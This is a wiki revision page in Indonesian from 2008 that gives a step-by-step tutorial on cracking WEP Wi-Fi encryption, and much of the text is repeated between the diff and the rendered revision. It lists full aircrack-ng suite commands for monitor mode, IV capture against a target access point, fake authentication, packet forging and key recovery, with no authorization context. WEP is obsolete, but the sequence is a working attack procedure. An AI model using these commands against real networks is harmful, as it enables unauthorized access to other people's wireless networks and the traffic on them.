Difference between revisions of "Teknik Menjebol WEP"
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
Line 24: | Line 24: | ||
# iwconfig eth1 | # iwconfig eth1 | ||
# airmon-ng start eth1 | # airmon-ng start eth1 | ||
− | # airodump-ng eth1 | + | # airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1 |
− | + | Teknik selanjutnya membutuhkan kemampuan untuk berasosiasi dengan Access Point, sayangnya biasanya sukar untuk dapat berasosiasi dengan Access Point yang terenkripsi. Jika ada bug di Access Point, kita bisa lakukan fake authentication seolah-olah kita telah bergabung ke Access Point tersebut | |
− | |||
− | |||
# aireplay-ng -1 0 -e ssidaccesspoint -a $AP -h $WIFI eth1 | # aireplay-ng -1 0 -e ssidaccesspoint -a $AP -h $WIFI eth1 | ||
+ | Jika berhasil authentikasi, kita dapat membuat packet palsu yang akan kita gunakan untuk memanipulasi traffic | ||
+ | paket yang lewat dari / menuju access point. Perintah yang digunakan adalah | ||
+ | |||
+ | # aireplay-ng -5 -b $AP -h $WIFI eth1 | ||
+ | |||
+ | |||
+ | Setelah kita cukup banyak berhasil menangkap paket. Proses cracking [[WEP]] dapat dilakukan menggunakan | ||
+ | |||
+ | # aircrack-ng -n 64 hasilcapture.ivs | ||
Revision as of 06:12, 11 June 2008
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP.
- Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.
Misalnya,
BSSID 00:30:4F:4E:2B:50 WIFI 00:11:6b:33:d3:90 CHANNEL 2
Untuk memudahkan operasi ada baiknya melakukan
# export AP=00:30:4F:4E:2B:50 # export WIFI=00:11:6b:33:d3:90 # export CHANNEL=1
Teknik mencari data BSSID & CHANNEL di atas menggunakan perintah, misalnya, card WLAN di eth1.
Pastikan bahwa eth1 berada pada mode monitor
# iwconfig eth1 mode monitor # iwconfig eth1 # airmon-ng start eth1 # airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1
Teknik selanjutnya membutuhkan kemampuan untuk berasosiasi dengan Access Point, sayangnya biasanya sukar untuk dapat berasosiasi dengan Access Point yang terenkripsi. Jika ada bug di Access Point, kita bisa lakukan fake authentication seolah-olah kita telah bergabung ke Access Point tersebut
# aireplay-ng -1 0 -e ssidaccesspoint -a $AP -h $WIFI eth1
Jika berhasil authentikasi, kita dapat membuat packet palsu yang akan kita gunakan untuk memanipulasi traffic
paket yang lewat dari / menuju access point. Perintah yang digunakan adalah
# aireplay-ng -5 -b $AP -h $WIFI eth1
Setelah kita cukup banyak berhasil menangkap paket. Proses cracking WEP dapat dilakukan menggunakan
# aircrack-ng -n 64 hasilcapture.ivs